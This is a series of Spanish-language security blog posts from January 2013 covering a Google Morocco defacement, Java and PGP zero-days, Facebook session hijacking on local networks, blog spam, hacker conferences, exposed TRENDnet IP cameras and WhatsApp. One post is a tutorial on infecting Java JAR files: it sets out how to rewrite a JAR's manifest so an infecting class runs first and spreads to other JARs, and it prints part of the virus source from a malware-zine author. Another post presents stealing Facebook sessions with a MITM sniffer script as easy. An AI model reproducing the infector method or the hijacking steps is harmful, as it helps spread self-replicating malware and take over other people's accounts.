miércoles, enero 23, 2013

Dia 112 - Deface a Google marroqui

La web google.co.ma ha sido atacado por un grupo de hackers denominado PAKbugs. Las ultimas informaciones concluyen que se habria producido un ataque hijack (secuestro).

Tomando en la web de Symantec por ejemplo, leemos que un hijack es el tipo de ataque donde un intruso toma control de una sesión de comunicación existente entre un servidor y un usuario legítimo que se ha conectado y autenticado con el servidor. El intruso puede supervisar la sesión de manera pasiva al registrar la transferencia de información confidencial, como contraseñas y códigos. Otro tipo de secuestro implica un ataque activo efectuado al forzar la desconexión del usuario (con ataque de negación de servicio) y tomar control de la sesión. El intruso comienza a actuar como el usuario, ejecutando comandos y enviando información al servidor.

Ha sido publicado en el portal especializado en acoger defeaces zone-h, del cual podeis ver un mirror aqui:

https://www.zone-h.org/mirror/id/19094784 

Lo que no conozcáis el portal, os cuento un poco como los usuarios categorizan sus defaces:


  • H - Deface a la pagina inicial 
  • M - Deface Masivo
  • R - Redefacement 
  • L - IP address location 
  • * - Deface especial, debido a la importancia o relevancia del mismo
Estos hackers tienen bastantes estrellas, por lo que como podéis ver el nivel es bastante alto...

Ademas, no es la primera vez que esto ocurre, recientemente, en Noviembre de 2012, Yahoo y Google en Rumania fueron fruto de ataques similares, mediante el envenenamiento de DNS. Os dejo un grafico bastante explicativo de este tipo de tecnica, podeis encontrar mucha informacion al respecto en la red.


viernes, enero 18, 2013

Dia 111 - Nuevo Java 0 day por 5000 $

Varios portales especializados han recomendado deshabilitar la maquina virtual de Java debido a dos vulnerabilidades de día 0, las cuales todavía no han sido corregidas.

En el CVE-2013-0422, se especifica que :
Esta alerta de seguridad se ocupa de cuestiones de seguridad CVE-2013-0422 y otra vulnerabilidad que afecta a ejecutar en un navegador web Java. Estas vulnerabilidades no son aplicables a Java que se ejecuta en servidores autónomos, aplicaciones de escritorio o aplicaciones Java embebido Java. Tampoco afecta a Oracle software basado en servidor
El problema es que Java esta presenta en mas de 3 billones de equipos, los cuales muchos sin tener ni idea. Según un informe de krebsonsecurity, un experto en seguridad publico este mensaje:
“New Java 0day, selling to 2 people, 5k$ per person.
And you thought Java had epically failed when the last 0day came out. I lol’d. The best part is even-though java has failed once again and let users get compromised… guess what? I think you know what I’m going to say… there is yet another vulnerability in the latest version of java 7. I will not go into any details except with seriously interested buyers.
El gobierno de EEUU, Firefox y otras tantas compañías han tomado medidas para paliar este sin fin de tropelías en una compañía que desde la absorción de Sun, no ha dejado de sobresaltarnos. No muchos sitios requieren ya Java, y todavía resiste software de escritorio que lo utilizar como medio de comunicación con el sistema.

En mi caso ademas de no utilizarlo, aprendí del amigo Yago Jesús  que el NoScript es parte de mi vida. La pregunta realmente que se me plantea en este termino es.. ¿Realmente podemos vivir sin Java?

http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html

lunes, enero 07, 2013

Dia 110 - Como hackear Facebook en redes locales

En este sensacionalista post, para todos los que tenéis ese afan por conocer llamado Hacking, vemos la sencillez de robar una sesión de Facebook con cuatro herramientas libres y un poco de ingenio.

En el video, el ponente usa la distribución de Linux Backtrack Linux, enfocada y especializada en muchos campos de la Seguridad Informatica. Como comentario de la version y la distro decir que la Backtrack 5 R3 fue lanzada el 13 de Agosto del pasado año.

La técnica que va a usar en una técnica en principio sencilla y limpia, conocida como Hijacking. Dicha técnica consiste en secuestrar una sesión que el usuario legitimo ha abierto previamente, y hacérnosla propia. En lenguajes de programación, tenemos dos mecanismos para  la gestión de la información de usuario, las cookies y las sesiones. Para no alargarme os dejo un link que explica esto mismo, por ejemplo en PHP :

Cookies y sesiones en PHP

Este tipos de ataques dueron muy populares hace no mucho tiempo cuando se lanzaba la aplicacion FireSheep. En este caso el autor va a utilizar Greasemonkey y un script para el mismo, anclados al navegador Firefox. Bien. lo primero que nos encontramos es que nos lleva a los foros oficiales de Backtrack para descargarnos el Passsniffer.sh, el cual merece la pena leer para comprender su función (como deshabilita IPTABLES, como hace un pequeño MITM automatico .... )

Descarga Passsniffer.sh

Solo como comentario, y para no destriparlos el final de la película  fijaos en la potencia de la herramienta de monitoreo Wireshark(por muchos conocido ya desde su padre Ethereal)




Recomendaciones finales:


  • Si es posible no usar ordenadores públicos para uso privado.
  • Siempre cerrar sesión de nuestras cuentas, no dejarla abierta.
  • Siempre marcar la casilla de que no recuerde nuestra sesión.
  • Siempre decirle al navegador que no recuerde nuestras contraseñas.
  • Usar técnicas como la navegación privada (disponible por ejemplo en Chrome y Firefox.)




domingo, enero 06, 2013

Dia 109 - Zero day en PGP Whole Disk Encryption

Seguimos sin levantar cabeza. Symantec es uno de los buques insignia del desarrollo de aplicaciones de seguridad, pesadas, caras e inservibles. Hace no mucho sufrieron sucesivos ataques a sus soluciones y fueron expuestas lineas clave de su codigo fuente. Ahora Sufren una vulnerabilidad Zero Day en su sistema de cifrado para PGP.

Como reza su web, PGP Whole Disk Encryption de Symantec brinda a las organizaciones una completa solución de cifrado de disco de alto rendimiento para todos los datos (archivos de usuario, archivos de intercambio, archivos del sistema, archivos ocultos, etc.) en equipos de escritorio, equipos portátiles y soportes extraíbles. Este software de cifrado de disco completo protege los datos contra el acceso no autorizado, ya que brinda protección eficaz para datos de los clientes, partners y propiedad intelectual.

Los sistemas protegidos pueden administrarse de manera centralizada con PGP Universal Server, lo que simplifica la implementación, la creación y distribución de políticas, y la elaboración de informes. La version afectada, Symantec PGP Desktop 10.2.0 Build 2599

El pgpwded.sys incluido en el kernel, incluye una vulnerabilidad, según publico el 25 de Diciembre Nikita Tarakanov en su Twitter. Sin embargo, Symantec confirmo que la explotación de la amenaza seria limitada ya que solo versiones de Windows XP y Windows 2003 Server serian vulnerables ademas de que la vulnerabilidad solo seria explotaba en modo ON SITE.

En principio tienen previsto lanzar el parche que soluciona esta vulnerabilidad en Febrero. Os dejo los detalles publicados en Pastebin:

http://pastebin.com/pEBSjsmC 

Ademas, es interesante echarle un ojo a los papers oficiales de Symantec:

http://www.symantec.com/content/en/us/enterprise/fact_sheets/b-pgp_whole_disk_encryption_DS_21064414.en-us.pdf

http://www.symantec.com/content/en/us/enterprise/white_papers/b-pgp_how_wholedisk_encryption_works_WP_21158817.en-us.pdf

Como nota interesante ademas, os dejo que el Gobierno holandés publica directrices para la divulgación responsable de vulnerabilidades. Mas que nada porque a veces, los protocolos, y las normas de seguridad de publican , fallan:

http://news.softpedia.es/El-Gobierno-holandes-publica-directrices-para-la-divulgacion-responsable-de-vulnerabilidades-318757.html

sábado, enero 05, 2013

Dia 108 - Spam en Blogger, Wordpress y similares

En los inicios de Internet no había spam. No tardó en aparecer, pero al principio era poco y no suponía muchas molestias. Por desgracia, el volumen de spam ha crecido, junto con las "arañas" de los spammers, y, lo que es peor, se ha vuelto más sofisticado tecnológicamente, a fin de cruzar de manera automática la barrera impuesta por los filtros antispam. Una estrategia cada vez más habitual en el spam es usar capas de imágenes.

Hoy he habilitado los comentarios de forma abierta. Quiero decir con esto que no solo restringo los comentarios a usuarios de Google sino que también cualquier usuarios con OpenID (Livejournal, Wordpress, AIM...) puede realizar comentarios en mi blog. Modo test ON

Realmente no me preocupan los comentarios en si mismos, ya que este blog mio tiene una difusión muy acotada e incluso me atrevería a decir diversificada, sino el maldito Spam. Voy a daros unos tips o truquitos para evitar estos males si usáis plataformas cerradas o no os quieres matar mucho la cabeza con configuración es avanzadas y mantener vuestros sitios libres de esta plaga. Aunque como decia un colega mio, "las visitas siempre son visitas".

Primero debemos tener claro que el spam es una plaga muy evolucionada y que muchos bots pueden saltarse las restricciones con suma facilidad. En los sistemas tipo blog, en los cuales la comunicación es unidireccional, la única posibilidad de entrada es mediante los comentarios.

Bien Google, como comento arriba establece cuatro niveles de filtrado, que podeis modificar desde Configuracion | Entradas y comentarios. Los cuatros niveles son:


  • Cualquier usuario: Literal, cualquiera sin restricciones, inclusive anonimos 
  • Usuario Registrado: Filtra los anonimos, solo usuarios con OpenID (Livejournal, Wordpress, AIM...).
  • Cuentas de Google: Cuentas de usuarios de Google. 
  • Miembros del blog: Solo los autores y/o componentes del mismo 


Ademas, Blogger nos proporciona el filtrado temporal, con las opciones a veces, siempre o nunca. La primera establece un filtro temporal para decidir a antigüedad que debe tener la entrada antes de que necesite moderación. Siempre y nunca, lo que dicen. El problema de nunca es que es un nido de spammers, trolls y demas fauna, y el problema de siempre es que tu correo va a echar humo.

La opción del captcha puede ser otro paso para evitar el spam, pero no es 100 % fiable. Podemos configurarla en el mismo menú. Las plataformas con administración avanzada como foros, cms y blogs mas potentes permiten el uso de plugins, y addons para gestionar y filtrar los comentarios, pero recordad que cuantos mas chismes instalemos, mas al tanto debemos estar para no comprometer la seguridad de nuestro site.

El tiempo me confirmara si la opción que he elegido no es la mas recomendable, pero siempre puede cambiarse.

viernes, enero 04, 2013

Dia 107 - Comparativa de conferencias Hacker

El Instituto Nacional de Tecnologías de la Comunicación (INTECO) ha catalogado un troyano para la plataforma Windows, llamado Bublik.B, que se hace pasar por una actualización del sistema operativo con el fin de que sea ejecutado por el usuario. 

Lo cierto es que me paso factura el no poder asistir a la NoconName, y esta noticia me ha alegrado el día.
Os anunciamos que el día 14 de enero, lunes, se abrirá el formulario de registro para adquirir vuestras entradas para la siguiente edición de Rooted CON, la cuarta, cuyas fechas serán 7, 8 y 9 de marzo. Os recomendamos que *reviséis con calma las condiciones generales* puesto que hemos añadido una serie de restricciones para la adquisición de entradas con descuento de estudiante. En concreto, a partir de este año solamente aceptaremos registros como estudiante de personas que NO estén en activo en forma alguna y que acrediten su condición de estudiante con la matrícula vigente para este curso (ojo, de ninguna manera vamos a aceptar carnets de estudiante). Y, sobre todo, menos todavía vamos a emitir facturas a gente que se haya registrado como estudiante.
Hoy me quiero centrar en un análisis de dichas conferencias a nivel nacional No he tenido la suerte de salir fuera de España. No voy a exponer las maravillas de estas conferencias, ni el buen ambiente que reina, ni lo que te alegra ver a los colegas. Voy a atacarles categóricamente, comparándolas con las conferencias SEO y SocialMedia. No son tópicos, pero bien es real que existen muchas excepciones en ambas direcciones.

 Para darle originalidad, va a modo de comparativa:


  • Las conferencias de seguridad acuden empresas de todos los ámbitos, muchas con la única intención de participar del conocimiento. Las de marketing online - SEO, acuden empresas de un solo ámbito, muchas con la única intención de vender o sacar clientes.
  • Las conferencias de seguridad puedes encontrar gente brillante que te hable con una sencillez como el que come bizcochos. En las de marketing online - SEO, hay bizcochos :)
  • El nivel de féminas en una Con, es de una por cada 500 (en términos cualitativos una por cada 10 m2). El nivel masculino en  las de marketing online - SEO, es de un hombre por cada 7 mujeres. (en términos cualitativos una por cada 3 m2).
  • En el nivel de comida/bebida, estableceremos un empate técnico (las conchas Codan son bastante desequilibrantes)
  • El enfoque de la conferencias de seguridad es el aprendizaje y el conocimiento, En las de marketing online - SEO el mantra es la venta.
  • En las de marketing online - SEO, los hackers con unos frikis, unos desalmados que estropean tu trabajo, unos trasnochadores granudos y sin vida social. Las conferencias de seguridad, los de marketing online son unos estirados.
  • En marketing online - SEO cualquier se llama a si mismo experto en. Un mantra del Hacker es que no te llamas a ti mismo, sino que te llaman los de mas Hacker.
  • Hay gente brillante en cualquiera de ellas. No podemos generalizar nunca.
  • El marketing online - SEO esta de moda y hay mucha demanda y trabajo. En España las empresas y profesionales siguen siguen prestar atencion a la seguridad.

¿Que pensáis vosotros? ¿Cual es vuestra experiencia?

jueves, enero 03, 2013

Dia 106 - Agujero de seguridad en camaras ip

Todo esto viene a raíz de un bug encontrado en las cámaras de vigilancia del fabricante TRENDNET, y que fue publicado por los amigos de RedesZone.

Para meternos en harina, podéis consultar el post original aquí:

http://www.redeszone.net/2012/01/25/enorme-agujero-de-seguridad-en-camaras-ip-de-trendnet/

El caso es que se descubre un modelo o varios de cámaras que permiten el acceso anónimo a la visualización de las imágenes que esas cámaras envían a la red. Las cámaras IP no solo permitían dicho acceso sino que la mayoría permitían la administración remota, por lo cual quedaban al antojo del usuario que las gestione.

Bueno, en principio podemos inclinarnos a pensar que TRENDNET actuo correctamente, ya que publico un parche para actualizar el firmware de dichas cámaras  y envió un mail a los usuarios instándoles al parcheo de las mismas.

¿FIN?

Pues no.  recientemente RedesZone me comunica que hay una cuenta de Twitter que no solo esta publicando los listados de cámaras vulnerables (via el mismo Twitter o via Pastebin)  sino que se ha construido un bot para no cansarse demasiado en estos menesteres. Como no había muchos followers, la difusión no era mucha y empezamos a gestionar las acciones pertinentes.

Vuelta a comunicar con TRENDNET, que se lavan las manos y nos derivan a TRENDNET global. Permanecemos a la espera. En tanto, el amigo Yago Jesús publica una entrada en SecuritybyDefault sobre la seguridad en camaras ip y dicha cuenta de Twitter, y aquí vino el problema. No por nada, sino porque son un portal experto, consumado, fiable, y por ende, con mucha difusión  ¿El resultado? Que dicha cuenta, dicha difusión, y dicha exposición multiplicadas por cinco.

Pero, claro la conclusión a la que llegamos es compleja. Tanto RedesZone como SecuritybyDefault hacen un papel fantástico en la difusión y alerta como hasta ahora. TRENDNET, cumple con su parte.

Sin embargo, los usuarios están expuestos, muchos no saben del problema que tienen, y por las imágenes que hemos podido ver, aunque lo supieran no podrían solventarlo (personas inexpertas, de avanzada edad....)

La pregunta se queda en el aire ¿De quien es la culpa y que puede hacer para solucionarlo?

miércoles, enero 02, 2013

Dia 106 - Como infectar un archivo JAR

Java es un potente lenguaje de programación desarrollado por Sun Microsystems, y que fue comprado por Oracle.Hace unos meses ya se publico una vulnerabilidad. 
Hoy te enseñamos como realizar una infección a un archivo de empaquetamiento de Java (.jar). 

Primeramente reseñar que el tutorial este es una recopilación de varias fuentes que podéis ver al final del mismo. Si queréis compartirlo, citar las fuentes originales que se han currado el trabajo. Un archivo JAR no es otra cosa que una compilación de varios archivos de JAVA. Para ello solo tenemos que introducir el comando correspondiente:

  java -jar archivo.jar

 Dentro tenemos el archivo manifest. Se usa para definir datos relativos a la extensión y al paquete. Es un archivo de metadatos llamado MANIFEST.MF y organizado con pares nombre-valor organizado en diferentes secciones. Si se pretende usar el archivo jar como ejecutable, el archivo de manifest debe especificar la clase principal de la aplicación. Esto como recordatorio, que también podéis encontrar info en esta web sobre los archivos JAR y en la documentacion oficial sobre JAVA de Oracle. Al lio. ¿Como funciona la infeccion? Realmente es muy sencillo, y es tan sencillo como listar los archivos .jar, buscar el manifest, buscal la clase principal y reemplazarla por nuesta clase infectada.

 Viendolo por pasos, un manifest:

  Manifest-Version: 1.0 
 Class-Path: 
 Main-Class: someClassName

 El codigo que compilaremos:

public class Infect { 

 public static void main ( String args [ ] ) { javax . swing . JOptionPane . showMessageDialog ( null, \"Hi this is Java Infect0r\nand welcome to Valhalla #3!\" ) ; 

 someClassName a = new someClassName ( ); 

 a . main ( args ) 

 CompileSourceInMemory b = new CompileSourceInMemory ( ) ; 

 try { b . main ( args ) ; 

 } catch ( Exception e ) { } 
 } 
 } 
 // create a temporary class with the name of the main class to prevent errors while compiling 

class someClassName 

public static void main ( String [ ] args ) 
{ System . out . println ( ) ;

} 

En esta clase se ejecuta el MainClass original ("someClassName"). Después de ejecutar el archivo original, se ejecuta el código del virus para infectar a otros archivos ("CompileSourceInMemory"). La segunda clase sólo se utiliza para evitar errores durante la compilación . Cuando el nuevo archivo se compila, el virus copia su propia clase y los nuevos archivos compilados en la carpeta temporal del fichero host, modifica el MANIFESTO.MF de modo que el Infect.class se ejecuta primero. Asi quedara nuestro manifest tras la infección:
Manifest-Version: 1.0
Class-Path:
Main-Class: Infect
Como conclusión, el autor relata la facilidad para escribir virus y malware usando el compilador de Java, creo que convendréis conmigo en que viene dado también por la potencia del lenguaje, y la difusión de un lenguaje potente pero peligroso.

Autor original del articulo:


R3s1stanc3 [vxnetw0rk]    December, 2012
r3s1stanc3@tormail.org - r3s1stanc3.virii.lu

martes, enero 01, 2013

Dia 105 - Otra vez Whatsapp

WhatsApp vuelve a caerse y no deja conectarse a sus usuarios. Este membrete fue de una noticia que aconteció hace ya unas semanas. Sin embargo, ha vuelto a pasar.El portal RedesZone publico un buen análisis sobre la fiabilidad de Whatsapp, y no deberíamos perdernos la conclusión al respecto. Al final la conclusión siempre es la misma. La pasta. Whatsapp, sigue teniendo problemas serios de seguridad, a pesar de que si que han cifrado los mensajes, los mismos siguen permaneciendo en sus servidores hasta la eternidad, sigue siendo muy facil hacerle cualquier tipo de ataque (lease MITM, spoofing...) y en caso de sustracción del terminal, se puede liar una muy buena. Pero seamos objetivos, ¿que otra herramienta podemos usar? Se esta poniendo muy de moda desde el mundo oriental LINE, pero claro, con la batería de los smartphones actuales, no es una alternativa real, ya que literalmente se bebe la batería, y no hay móviles que lleguen a los 4000mAH. El amigo Yago, de SecuritybyDefault me recomendo el uso de SpotBross, una aplicaciones buena y son tonterías, con una política de seguridad y respuesta de incidentes muy buena. Sin embargo, desde las ultimas versiones, se esta convirtiendo en algo demasiado social, para mi. El problema, el de siempre. La pasta. Para mantener el ritmo, hacen falta recursos, y estamos hablando de aplicaciones gratuitas (en principio) y no todas las apps pueden o quieren introducir en publicidad, que podria ser su sustento. Creo que he visto un par de chavalillos con el mono de Whatsapp. Les voy a preguntar...